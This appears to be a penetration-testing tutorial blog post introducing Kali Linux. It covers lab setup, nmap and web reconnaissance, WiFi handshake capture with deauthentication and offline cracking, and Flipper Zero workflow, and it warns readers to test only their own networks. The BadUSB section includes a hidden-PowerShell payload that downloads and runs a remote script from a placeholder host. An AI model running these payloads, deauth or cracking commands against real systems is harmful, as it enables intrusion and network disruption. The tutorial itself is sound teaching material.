Kali Linux Fundamentals: Build Your Hacking Laboratory

The Hacker's Path: A 5-Part Series

Part 1: Introduction → Part 2: Flipper Mastery → Part 3: Kali Fundamentals → Part 4: Exploitation → Part 5: The Full Audit

In Parts 1 and 2, you cloned cards, analyzed radio frequencies, and understood why most "security" is theater. You've seen vulnerabilities from the outside. Now you step inside and see them from the attacker's perspective.

Kali Linux is the industry-standard penetration testing distribution. It comes pre-loaded with over 600 security tools. This can feel overwhelming. Most tutorials throw you into the deep end with commands you don't understand and no context for why they matter.

We're doing this differently. By the end of this article, you'll have a working lab, understand network reconnaissance at a fundamental level, and capture your own WiFi handshake. Each step builds on the last.

Part 1: Building Your Laboratory

Professional penetration testers don't run Kali on their main machine. They use isolated environments that can be reset, snapshotted, and destroyed without affecting their primary system. You'll do the same.

Option A: Virtual Machine (Recommended for Learning)

A virtual machine gives you the safest learning environment. You can snapshot your progress, make mistakes, and roll back instantly.

What You'll Need

• Host machine: 16GB+ RAM, 50GB+ free disk space, modern CPU with virtualization support
• Virtualization software: VirtualBox (free) or VMware Workstation Player (free for personal use)
• Kali Linux: Official pre-built VM from kali.org

Project: Kali VM Setup

Time: 30-45 minutes

Steps:

1. Download the Kali VM image for your hypervisor (VirtualBox or VMware)
2. Extract the downloaded archive (7-Zip recommended for Windows)
3. Import the VM into your hypervisor
4. Configure resources: 4GB RAM minimum (8GB recommended), 2+ CPU cores
5. Enable network adapter in "Bridged" mode for full network access
6. Boot the VM and log in with default credentials: kali / kali
7. Open terminal and run: sudo apt update && sudo apt full-upgrade -y
8. Create a snapshot named "Fresh Install" for easy recovery

Verify success: You can open a terminal, run whoami, and see kali.

Option B: Dedicated Hardware (For Serious Practice)

Once you're comfortable with Kali, dedicated hardware removes VM overhead and enables full hardware access, which is essential for wireless testing.

Hardware Recommendations

For now, a VM is perfect. Dedicated hardware becomes important when you need monitor mode for wireless testing (covered later in this article).

Option C: Live USB (Zero Persistence)

A live USB runs Kali directly without installation. Everything disappears when you power off. Useful for testing on different hardware, but you'll lose your work each session unless you create a persistent partition.

1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcher

dd Destroys Data

The dd command writes directly to disk with no confirmation. Triple-check your device name. Writing to the wrong device will wipe that drive completely.

Part 2: The Terminal Mindset

Before we touch security tools, you need to be comfortable in the terminal. This isn't optional. The GUI exists in Kali, but real work happens on the command line.

Essential Navigation

1# Know where you are
2pwd                    # Print working directory
3
4# Move around
5cd /home/kali          # Go to home directory
6cd ..                  # Go up one level
7cd -                   # Go to previous directory
8
9# See what's here
10ls                     # List files
11ls -la                 # List all files with details
12ls -lah                # Human-readable sizes
13
14# Read files
15cat filename           # Display entire file
16less filename          # Scrollable view (q to quit)
17head -n 20 filename    # First 20 lines
18tail -f filename       # Follow file in real-time (logs)

Privilege Escalation

Many security tools require root access. In Kali, sudo gives you temporary root privileges.

1sudo command           # Run single command as root
2sudo -i                # Start root shell (be careful)
3whoami                 # Check current user
4id                     # Show user and group IDs

Root Responsibly

Running as root means no safety nets. A typo like rm -rf / will destroy everything. Modern Kali prevents this specific command, but the principle stands: understand what you're running before you run it.

Process Management

1ps aux                 # All running processes
2top                    # Real-time process viewer
3htop                   # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c                 # Stop current process
7ctrl+z                 # Suspend process
8bg                     # Resume in background
9fg                     # Bring to foreground
10
11# Kill processes
12kill PID               # Graceful termination
13kill -9 PID            # Force kill (last resort)

Network Commands

1ip a                   # Show network interfaces
2ip route               # Show routing table
3ping -c 4 8.8.8.8     # Test connectivity
4curl ifconfig.me       # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.com

Project: Terminal Orientation

Time: 15 minutes

Tasks:

1. Find your IP address on the local network using ip a
2. Identify your default gateway using ip route
3. Ping your gateway to confirm connectivity
4. List all files in /etc sorted by modification time: ls -lt /etc | head
5. Read the first 50 lines of /etc/passwd: head -n 50 /etc/passwd

Goal: You should be able to navigate, check network status, and read files without thinking.

Part 3: Network Reconnaissance with Nmap

Nmap (Network Mapper) is the most important tool you'll learn. It discovers hosts, identifies services, detects operating systems, and maps network topology. Everything else builds on nmap output.

Your First Scan

Let's scan your own network. First, identify your network range:

1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-255

1# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnet

You'll see output like:

1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

That first scan tells you: "These devices exist on my network." Now let's ask deeper questions.

Service Detection

Once you know what hosts exist, you want to know what services they're running.

1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)

Common output:

1PORT     STATE SERVICE  VERSION
222/tcp   open  ssh      OpenSSH 8.4p1
380/tcp   open  http     nginx 1.18.0
4443/tcp  open  ssl/http nginx 1.18.0

Operating System Detection

1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1

Understanding Port States

Nmap reports ports in several states:

• open - Application actively accepting connections. This is what attackers look for.
• closed - Port accessible but no application listening. The host is up but nothing's there.
• filtered - Firewall or filter blocking the probe. Can't determine if open or closed.
• unfiltered - Port accessible but nmap can't determine if open or closed.

Scan Types and Stealth

1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap target

Nmap Scripting Engine (NSE)

NSE extends nmap with specialized scripts for vulnerability detection, service enumeration, and more.

1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20

Project: Map Your Network

Time: 30 minutes

Prerequisites: Know your network range from ip a

1. Discover all hosts: sudo nmap -sn YOUR_NETWORK/24
2. List the hosts discovered and their MAC addresses
3. Choose your router (usually .1) and run: sudo nmap -sV -sC YOUR_ROUTER
4. Identify all open ports and services on your router
5. Run sudo nmap -A YOUR_COMPUTER to see what your own machine exposes

Document: Create a text file listing every device, its IP, MAC, and services. This is your network map.

Part 4: Web Reconnaissance

Your nmap scan probably found HTTP services (ports 80, 443, 8080). Let's understand what's running there.

Whatweb: Quick Service Identification

# Identify web technologies
whatweb http://192.168.1.1

Example output:

1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]

Nikto: Web Vulnerability Scanner

1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentials

Directory Enumeration: What's Hidden?

Web servers often have directories not linked from the main page: admin panels, config files, backup files.

# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Common finds:

1/admin   (Status: 301)
2/backup  (Status: 403)
3/config  (Status: 200)
4/login   (Status: 200)

Wordlists Location

Kali includes extensive wordlists in /usr/share/wordlists/. The most common directories: dirb/, dirbuster/, rockyou.txt (passwords), and seclists/ (comprehensive collection).

Project: Audit Your Router's Web Interface

Time: 20 minutes

1. Run whatweb http://YOUR_ROUTER_IP to identify the server
2. Run nikto -h http://YOUR_ROUTER_IP to check for vulnerabilities
3. Run gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
4. Visit any discovered directories in a browser
5. Note any admin panels, version numbers, or interesting findings

Common finding: Router admin pages exposed with default credentials.

Part 5: Wireless Reconnaissance

This is where things get interesting. WiFi networks broadcast constantly, and with the right tools, you can capture authentication handshakes: the encrypted exchange that happens when a device connects.

Hardware Requirements

Your built-in WiFi probably won't work for this. You need an adapter that supports monitor mode and packet injection. Recommended: Alfa AWUS036ACH ($50) or Alfa AWUS036ACM ($45). These work out-of-box with Kali.

Understanding Monitor Mode

Normal WiFi mode ("managed mode") only receives packets addressed to your device. Monitor mode captures all packets in range, every device's traffic on the channel.

1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0mon

Scanning for Networks

1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID  = Router MAC address
6# PWR    = Signal strength (higher = closer)
7# CH     = Channel
8# ENC    = Encryption (WPA2, WPA3, OPN)
9# ESSID  = Network name
10
11# Press Ctrl+C to stop

What you're seeing is every WiFi network in range, their security settings, and often the devices connected to them. This is what a war driver sees when scanning neighborhoods.

Capturing a Handshake

When a device connects to a WPA2 network, there's a four-way handshake. If you capture this handshake, you can attempt to crack the password offline.

1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshake

When you capture a handshake, airodump-ng shows [ WPA handshake: XX:XX:XX:XX:XX:XX ] in the top-right corner.

Deauth Attacks Are Illegal

Sending deauthentication packets to networks you don't own is a federal crime under the Computer Fraud and Abuse Act (in the US) and similar laws elsewhere. Only test on your own network. The point is to understand the vulnerability, not to attack others.

Cracking the Handshake

With a captured handshake, you can attempt to crack the password offline using a wordlist:

1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt

Password Strength Reality Check

rockyou.txt contains 14+ million passwords from real data breaches. If your WiFi password is "password123" or "summer2024" or your dog's name, it's crackable in seconds. A random 12+ character password would take millions of years to brute-force.

Project: Test Your WiFi Security

Time: 45 minutes

Prerequisites: External WiFi adapter with monitor mode support

1. Enable monitor mode: sudo airmon-ng start wlan0
2. Scan for networks: sudo airodump-ng wlan0mon
3. Note your own network's channel and BSSID
4. Capture on your channel: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
5. Reconnect a device to your WiFi (or use deauth on YOUR network)
6. Confirm handshake capture
7. Test against rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

Result: If your password was found, change it immediately to something random and long (20+ characters).

Part 6: Connecting Your Flipper Zero

Remember all those captures from Part 2? Let's integrate them with your Kali workflow.

Transferring Files

1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/       # Sub-GHz captures
9/mnt/flipper/nfc/          # NFC dumps
10/mnt/flipper/infrared/     # IR captures
11/mnt/flipper/lfrfid/       # 125kHz RFID
12/mnt/flipper/badusb/       # BadUSB scripts

Analyzing NFC Dumps

1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | less

Sub-GHz Analysis

1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)

BadUSB Development

Create BadUSB payloads in Kali, test on the Flipper:

1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/

BadUSB Payloads Are Powerful

These scripts execute automatically when plugged in. A malicious payload could install backdoors, steal credentials, or destroy data in seconds. Only use on your own machines for testing. Never leave your Flipper where someone else might plug it in.

Part 7: Documentation and Workflow

Professional penetration testers don't just run tools. They document everything. Good documentation separates amateurs from professionals.

Note-Taking with CherryTree

1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitation

Saving Nmap Output

1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml  (parseable)
7# scan_results.gnmap (greppable)

Session Logging

1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop logging

The Hacker's Path

A 5-part series taking you from curious to capable.

Part 1: Introduction Part 2: Flipper Mastery Part 3: Kali Fundamentals ✓ Part 4: Exploitation Part 5: Full Audit

Part 3 Checklist

☐ Lab Setup: Kali VM running, updated, snapshot saved

☐ Terminal: Comfortable with navigation, permissions, process control

☐ Nmap: Network mapped, services identified, router scanned

☐ Web Recon: Router web interface analyzed with whatweb/nikto

☐ Wireless: Monitor mode enabled, networks scanned

☐ Handshake: Own WiFi handshake captured and tested

☐ Flipper: Files transferred, workflow understood

☐ Documentation: Notes organized, scans saved

What's Next

You've built your laboratory and learned the reconnaissance phase. You can discover hosts, identify services, and capture wireless handshakes. You understand what attackers see when they look at a network.

In Part 4, we move from reconnaissance to exploitation. You'll learn:

• Metasploit Framework, the Swiss Army knife of exploitation
• Common vulnerability exploitation workflows
• Post-exploitation techniques: what happens after initial access
• Privilege escalation: going from regular user to administrator
• Pivoting: using one compromised system to attack others

Reconnaissance tells you where the doors are. Exploitation teaches you how to walk through them.

You've mapped the territory. Now you learn to navigate it. Part 4 takes you from observer to operator.

See you in Part 4.